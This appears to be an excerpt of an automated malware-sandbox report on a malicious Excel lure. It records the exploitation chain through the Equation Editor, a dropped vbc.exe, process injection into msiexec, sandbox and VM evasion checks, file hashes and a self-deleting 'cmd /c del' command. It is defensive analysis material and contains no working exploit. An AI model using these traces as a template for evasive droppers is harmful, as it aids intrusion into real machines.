            Source: C:\Users\Public\vbc.exeCode function: 5_2_007729B2
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00823A83
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0081CBA4
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00797B00
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0076FBD7
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007FDBDA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02711238
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0266E2E9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026BA37B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02677353
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02672305
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0266F3CF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026963DB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02673040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0268905A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0269D005
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0266E0C6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02712622
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0267E6C1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02674680
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0267C7BC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026F579A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02681489
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026A5485
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0267351F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0268C5F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02723A83
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02697B00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0266FBD7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026FDBDA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0271CBA4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0269286D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0267C85C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270F8EE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026F5955
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026869FE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026729B2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0271098E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0268EE4C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026A2E2F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0269DF7C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02680F3F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0267CD5B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026A0D3B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FDDD
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000EC8C5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000D8C8B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000D8C90
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000D2D90
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000D2FB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_00B96F06
            Source: C:\Users\Public\vbc.exeCode function: String function: 007DF970 appears 68 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00425CA0 appears 138 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 0076DF5C appears 96 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 0076E2A8 appears 32 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00425873 appears 32 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 007B3F92 appears 89 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 007B373B appears 191 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 026B3F92 appears 105 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 026DF970 appears 81 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 026B373B appears 238 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0266DF5C appears 102 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0266E2A8 appears 38 times
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0044405D NtTerminateProcess,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00440058 NtCreateFile,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004462A8 NtCreateFile,NtCreateSection,NtMapViewOfSection,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004464A8 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00440568 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004415A8 NtWriteFile,NtCreateSection,NtClose,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00440688 CreateProcessInternalW,NtQueryInformationProcess,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtWriteVirtualMemory,NtResumeThread,NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0043FEE8 NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00440C17 NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00440F0A NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004185F0 NtCreateFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004186A0 NtReadFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00418720 NtClose,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004185EA NtCreateFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00760078 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00760048 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007600C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007607AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075F900 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075F9F0 NtClose,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FC90 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FEA0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00760060 NtQuerySection,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007610D0 NtOpenProcessToken,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00761148 NtOpenThread,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0076010C NtOpenDirectoryObject,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007601D4 NtSetValueKey,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075F8CC NtWaitForSingleObject,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00761930 NtSetContextThread,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075F938 NtWriteFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FA50 NtEnumerateValueKey,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FA20 NtQueryInformationFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FAB8 NtQueryValueKey,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FB50 NtCreateKey,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FBE8 NtQueryVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00760C40 NtGetContextThread,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FC48 NtSetInformationFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FC30 NtOpenProcess,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026600C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026607AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FB50 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265F900 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265F9F0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02660060 NtQuerySection,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02660078 NtResumeThread,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02660048 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026610D0 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02661148 NtOpenThread,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0266010C NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026601D4 NtSetValueKey,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FA50 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FA20 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FAD0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FAB8 NtQueryValueKey,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FBE8 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265F8CC NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02661930 NtSetContextThread,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265F938 NtWriteFile,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FE24 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FEA0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FFFC NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02660C40 NtGetContextThread,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FC48 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FC30 NtOpenProcess,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FC90 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0265FD5C NtEnumerateKey,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02661D80 NtSuspendThread,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000E85F0 NtCreateFile,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000E86A0 NtReadFile,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000E8720 NtClose,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000E85EA NtCreateFile,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_00B96A82 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_00B96F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
            Source: Cielert.tmp.4.drStatic PE information: No import functions for PE file found
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe 1EC8F5C2A626D9484AF9532ED48A5B7482FC0DCDAB074D8545AC8E4454C68A89
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Cielert.tmp 8916FF8C659E74F4A3523CDA054E5ED98209F84CB23F28C5857D670D5DC512E2
            Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe 1EC8F5C2A626D9484AF9532ED48A5B7482FC0DCDAB074D8545AC8E4454C68A89
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
            Source: Cielert.tmp.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Cielert.tmp.4.drStatic PE information: Section .text
            Source: RFQ_Order_PO_TAE5203E.xlsxVirustotal: Detection: 35%
            Source: RFQ_Order_PO_TAE5203E.xlsxReversingLabs: Detection: 34%
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$RFQ_Order_PO_TAE5203E.xlsxJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB36.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/15@3/3
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00436274 FindResourceA,LoadResource,LockResource,
            Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.560819872.0000000000460000.00000040.00020000.sdmp, vbc.exe, 00000005.00000002.560884485.00000000004EA000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.560868156.00000000004D9000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.560943288.0000000000750000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.526246673.00000000005C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.561680130.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.525339285.00000000002B0000.00000004.00000001.sdmp, msiexec.exe
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004258C0 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0044F951 push ecx; iretd
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00425CA0 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B832 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B83B push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004160CB push edx; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8D6 push ebp; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8F3 push ebp; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B89C push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C134 push ebp; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00407265 push cs; iretd
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004152C7 push edx; retf
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041537D push ebp; retf
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C5DD push ebp; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00415F76 push ds; iretd
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7E5 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00408783 push ecx; iretd
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0266DFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000E60CB push edx; ret
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000D7265 push cs; iretd
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000E52C7 push edx; retf
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000E537D push ebp; retf
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000D8783 push ecx; iretd
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000EB7E5 push eax; ret
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000EB83B push eax; ret
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000EB832 push eax; ret
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000EB89C push eax; ret
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000EB8D6 push ebp; ret
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000E5F76 push ds; iretd
            Source: hnmy[1].exe.2.drStatic PE information: section name: .bdata
            Source: vbc.exe.2.drStatic PE information: section name: .bdata
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00436591 GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,
            Source: initial sampleStatic PE information: section name: .text entropy: 7.32148562524
            Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\Cielert.tmpJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Found hidden mapped module (file has been removed from disk)Show sources
            Source: C:\Users\Public\vbc.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CIELERT.TMP
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042F0F0 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041B3B0 IsIconic,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042F8A0 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041DCC2 IsIconic,GetWindowPlacement,GetWindowRect,
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2848Thread sleep time: -240000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004088E0 rdtsc
            Source: C:\Users\Public\vbc.exeAPI coverage: 4.7 %
            Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00437A5E __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,
            Source: explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.549935611.000000000456F000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: explorer.exe, 00000006.00000000.549824786.00000000044E7000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 00000006.00000000.546753465.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
            Source: explorer.exe, 00000006.00000000.550067017.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00436591 GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004088E0 rdtsc
            Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
